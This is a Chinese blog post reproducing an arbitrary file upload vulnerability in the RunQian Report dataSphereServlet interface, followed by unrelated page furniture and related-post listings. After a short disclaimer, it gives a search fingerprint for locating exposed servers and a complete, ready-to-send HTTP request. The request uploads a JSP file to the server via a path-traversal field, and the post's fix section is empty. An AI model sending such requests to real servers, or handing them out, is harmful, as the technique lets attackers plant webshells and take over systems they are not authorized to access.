【漏洞复现】润乾报表dataSphereServlet接口存在任意文件上传漏洞

于 2024-05-01 10:54:52 发布
阅读量328 收藏 6
点赞数 4
文章标签: 渗透测试 漏洞复现 网络安全 安全测试 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u010025272/article/details/138368580
版权

漏洞描述

润乾报表是一个纯JAVA的企业级报表工具,支持对J2EE系统的嵌入式部署,无缝集成。润乾报表dataSphereServlet接口存在任意文件上传漏洞。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

漏洞集合

【传送点】上千漏洞复现复现集合 exp poc 持续更新

资产确定

body="润乾报表" || body="/raqsoft"

漏洞复现

漏洞链接:http://127.0.0.1/servlet/dataSphereServlet?action=38

POST /servlet/dataSphereServlet?action=38 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 397
Content-Type: multipart/form-data; boundary=eac629ee4641cb0fe10596fba5e0c5d9

--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="openGrpxFile"; filename="539634.jsp"
Content-Type: text/plain

<% out.println("873227518"); %>
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="path"

../../../
--eac629ee4641cb0fe10596fba5e0c5d9
Content-Disposition: form-data; name="saveServer"

1
--eac629ee4641cb0fe10596fba5e0c5d9--

在这里插入图片描述

在这里插入图片描述

修复方案

丢了少年失了心1
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
漏洞复现润乾报表 servlet/dataSphereServlet 任意文件上传漏洞
qq_67810151的博客
04-23 417
润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。
漏洞复现】先锋WEB燃气收费系统文件上传漏洞 1day
失心少年
01-12 150
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!访问http://ip:port/AjaxService/Upload.aspx验证。/AjaxService/Upload.aspx 存在任意文件上传漏洞。出现上面页面则证明漏洞存在
润乾报表平台 dataSphereServlet 任意文件上传漏洞复现
最新发布
0xSec
04-20 364
润乾报表平台 dataSphereServlet 接口存在任意文件上传漏洞,未经身份攻击者可通过该漏洞上传恶意后门文件,执行任意指令,最终可导致服务器失陷。
先锋WEB燃气收费系统文件上传漏洞
waxcj的博客
01-10 528
20240110
润乾报表平台 InputServlet 任意文件读取漏洞复现
0xSec
04-15 379
润乾报表平台 InputServlet 接口存在任意文件未经漏洞,未经身份攻击者可通过该漏洞读取系统内部配置文件及敏感数据凭证,使系统处于极不安全状态
漏洞复现润乾报表 InputServlet 任意文件上传漏洞
qq_67810151的博客
04-11 481
润乾报表存在任意文件上传漏洞,未授权的攻击者可以通过该漏洞上传任意恶意文件,从而控制服务器。
润乾报表入门问题记录
freekaiQaQ的博客
02-27 791
1.查询数量(count)时,在设计的报表直接取就可以,报表生成的表达式有点问题。   2: 动态宏 拼接 日期参数   case(dateType,list("1"), if(@fromD==null&&@toD==null,""  @fromD!=null&&@toD==null,"to_char(t.release_Date,'yyyy-mm-dd')>=to_char('"
phpcmsv9.0任意文件上传漏洞解析
01-19
漏洞存在地址: burp抓包 POST /phpcms_v9.6.0_UTF8/install_package/index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1 Host: 192.168.0.109 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:...
通达OA v2017 action_upload.php 任意文件上传漏洞.md
09-07
通达OA漏洞合集
动态 SQL 及安全性(Birt vs 润乾
cainiao_M的博客
07-29 224
静态 SQL 与动态 SQL 对于题目中提到的动态 SQL,显然应该有一种静态 SQL 与之相对,那么两者应该怎么理解?我们先来个基本的认识。 静态 SQL 之“静态”,意味着在执行之前就已经明确了该 sql 在数据库执行后的业务含义,也就是对于做啥事儿我们是清楚的,只不过需要知道这事儿的具体内容有哪些。比如“select userID,username from users where de...
无刷新上传
weixin_30602505的博客
11-11 32
需要一个jquery.ajaxfileupload.js,这个文件经过修改,经测试可以在大部分浏览器使用。 $.ajaxFileUpload( { url: '/Service/ajaxUpload.aspx?random=' + Math.random() + "&ClassID=" + questionClas...
最新0day!!用友U8-Cloud UploadFile接口存在任意文件读取漏洞
weixin_43167326的博客
04-02 535
U8 cloud 聚焦成长型、创新型企业的云 ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞
润乾报表InputServlet存在任意文件上传漏洞
weixin_43167326的博客
04-11 361
润乾报表是一个纯JAVA的企业级报表工具,支持对J2EE系统的嵌入式部署,无缝集成。服务器端支持各种常见的操作系统,支持各种常见的关系数据库和各类J2 EE的应用服务器,客户端采用标准纯html方式展现,支持ie和netscape.
润乾报表 - 缓存问题
weixin_33922672的博客
01-08 403
为什么改为填报属性之后还是不生效?还是会返回成仅供统计的状态. 解决:每一次修改了报表或者报表的填报属性之后,要发布一下,这样设置才会生效缓存问题 报表发布过以后   修改报表在点保存按钮,报表保存进的是发布的路径里面的那个文件   而不是您自己保存的那个路径下的文件每次修改以后是保存到发布的路径里了所以 发布过的报表在修改后 如果需要保存 就另存为一次...
内存溢出的排查步骤与解决建议
guxinghan12345的专栏
01-16 2719
本文对使用报表过程中出现内存溢出问题进行简单地分析,给出一些建议性的排查步骤和解决方法。 排查步骤与解决办法 定位问题 首先我们要判断出现的问题是否是由于内存溢出引起的,典型的后台信息是带有Out Of Memory字样,但是也不排除其他内存溢出的提示,如tomcat内存溢出可出现三种提示信息:Java heap space、PermGen space和unable to create ne
使用润乾报表的常见问题
热门推荐
艺术就是爆炸的专栏
08-12 1万+
最近工作需要,使用了润乾报表润乾报表是一个纯JAVA的企业级报表工具,功能很强大,可以做很多事情,可以做非常复杂的报表,不过我用到的比较简单,所以这里也就总结了一些比较基本的操作。 设计器如何打开 如果是安装的,那么直接到菜单下,打开润乾报表设计器就行了,如果是压缩包或者从别人那儿拷过来的,就运行\reportHome\bin下面的startup.bat就可以打开了。 做一个报表
万户oa officeserver.jsp任意文件上传漏洞复现
12-22
首先,攻击者需要找到目标系统上的OA officeserver.jsp文件,并确定该文件存在上传漏洞。接下来,攻击者可以通过浏览器或其他工具访问officeserver.jsp文件,并上传恶意的文件,比如Webshell文件。 在上传过程中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

丢了少年失了心1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值